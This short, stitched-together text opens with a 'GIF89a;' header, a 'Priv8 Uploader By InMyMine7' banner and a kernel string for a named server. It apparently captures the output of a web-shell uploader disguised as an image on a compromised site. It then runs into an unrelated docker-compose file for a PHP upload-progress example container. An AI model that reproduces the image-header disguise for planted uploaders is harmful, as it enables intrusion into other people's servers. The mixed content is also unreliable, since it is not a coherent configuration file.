GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
version: "3.7"
services:
webapp:
container_name: uploadprogress-example
image: uploadprogress-example
build:
context: ./.docker
args:
php_version: 7.4
uploadprogress_version: 1.1.2
ports:
- "8080:80"
volumes:
- "./.tmp:/tmp"
- ".:/var/www/html"